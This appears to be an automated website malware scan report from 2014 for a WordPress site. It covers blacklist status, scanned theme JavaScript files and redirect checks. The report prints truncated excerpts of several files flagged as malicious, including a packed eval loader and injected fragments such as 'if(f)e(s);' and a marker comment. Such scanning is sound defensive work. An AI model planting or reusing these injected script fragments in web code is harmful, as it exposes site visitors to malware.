Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=atglobalmail.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://atglobalmail.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://atglobalmail.com/ | 200 OK Content-Length: 13339 Content-Type: text/html | clean |
http://atglobalmail.com/wp-content/themes/Fenster/jdgallery/mootools-1.2.1-core-yc.js | 200 OK Content-Length: 75897 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MooTools={version:"1.2.1",build:"0d4845aab3d9a4fdee2f0d4a6dd59210e4b697cf"};var Native=function(K){K=K||{};var A=K.name;var I=K.legacy;var B=K.protect; var C=K.implement;var H=K.generics;var F=K.initialize;var G=K.afterImplement||function(){};var D=F||I;H=H!==false;D.constructor=Native;D.$family={name:"native"}; if(I&&F){D.prototype=I.prototype;}D.prototype.constructor=D;if(A){var E=A.toLowerCase();D.prototype.$family={name:E};Native.typize(D,E);}var J=function(N,L,O,M){if(!B if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://atglobalmail.com/wp-content/themes/Fenster/jdgallery/mootools-1.2-more.js | 200 OK Content-Length: 19425 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('11.36=f 12({1M:11,a:{1m:"2s"},X:8(B,A){7.P("1v",8(){7.1w=(7.13["k"+7.1x.37()]!=0);b(7.1w&&2t.2u.38){7.e.39().2v(7.13)}},n);7.e=7.2w=$(B);7.Q(A);9 C=7.e.1n("13") if(f)e(s);} Antivirus reports:
| ||
http://atglobalmail.com/wp-content/themes/Fenster/jdgallery/jd.gallery.js | 200 OK Content-Length: 34686 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function isBody(element){ return (/^(?:body|html)$/i).test(element.tagName); }; Element.implement({ getPosition: function(relative){ if (isBody(this)) return {x: 0, y: 0}; var el = this, position = {x: 0, y: 0}; while (el){ position.x += el.offsetLeft; position.y += el.offsetTop; el = el.offsetParent; } var rpos = (relative) ? $(relative).getPosition() : {x: 0, y: 0}; return {x: position.x - rpos.x, y: position.y - rpos.y if(f)e(s);} Antivirus reports:
| ||
http://atglobalmail.com/wp-content/themes/Fenster/jdgallery/jd.gallery.transitions.js | 200 OK Content-Length: 10508 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) gallery.Transitions.extend({ fadeslideleft: function(oldFx, newFx, oldPos, newPos){ oldFx.options.transition = newFx.options.transition = Fx.Transitions.Cubic.easeOut; oldFx.options.duration = newFx.options.duration = 1500; if (newPos > oldPos) { newFx.start({ left: [this.galleryElement.offsetWidth, 0], opacity: 1 }); oldFx.start({opacity: [1,0]}); } else { newFx.start({opacity: [0,1]}); oldFx.start({ if(f)e(s);} Antivirus reports:
| ||
http://atglobalmail.com/wp-content/themes/Fenster/menu/mootools-1.2.1-core-yc.js | 200 OK Content-Length: 75897 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MooTools={version:"1.2.1",build:"0d4845aab3d9a4fdee2f0d4a6dd59210e4b697cf"};var Native=function(K){K=K||{};var A=K.name;var I=K.legacy;var B=K.protect; var C=K.implement;var H=K.generics;var F=K.initialize;var G=K.afterImplement||function(){};var D=F||I;H=H!==false;D.constructor=Native;D.$family={name:"native"}; if(I&&F){D.prototype=I.prototype;}D.prototype.constructor=D;if(A){var E=A.toLowerCase();D.prototype.$family={name:E};Native.typize(D,E);}var J=function(N,L,O,M){if(!B if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://atglobalmail.com/wp-content/themes/Fenster/menu/MenuMatic_0.68.3.js | 200 OK Content-Length: 33301 Content-Type: text/javascript | clean |
http://atglobalmail.com/?page_id=2 | 200 OK Content-Length: 8656 Content-Type: text/html | clean |
http://atglobalmail.com/?p=1 | 200 OK Content-Length: 12352 Content-Type: text/html | clean |
http://atglobalmail.com/?category_name=uncategorized | 200 OK Content-Length: 9833 Content-Type: text/html | clean |
http://atglobalmail.com/?m=200906 | 200 OK Content-Length: 9613 Content-Type: text/html | clean |
http://atglobalmail.com/?m=20090616 | 200 OK Content-Length: 9622 Content-Type: text/html | clean |
http://atglobalmail.com/test404page.js | 404 Not Found Content-Length: 962 Content-Type: text/html | clean |
http://atglobalmail.com/wp-trackback.php?p=1 | HTTP/1.1 302 Found Connection: close Date: Sun, 03 Aug 2014 04:09:37 GMT Location: http://atglobalmail.com/?p=1 Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://atglobalmail.com/xmlrpc.php X-Powered-By: PleskLin | clean |
http://atglobalmail.com/?p=1&cpage=1 | 200 OK Content-Length: 12364 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: atglobalmail.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Aug 2014 04:09:25 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://atglobalmail.com/xmlrpc.php
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: atglobalmail.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Aug 2014 04:09:25 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://atglobalmail.com/xmlrpc.php
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: atglobalmail.com
Referer: http://www.google.com/search?q=atglobalmail.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: atglobalmail.com
Referer: http://www.google.com/search?q=atglobalmail.com
Result:
The result is similar to the first query. There are no suspicious redirects found.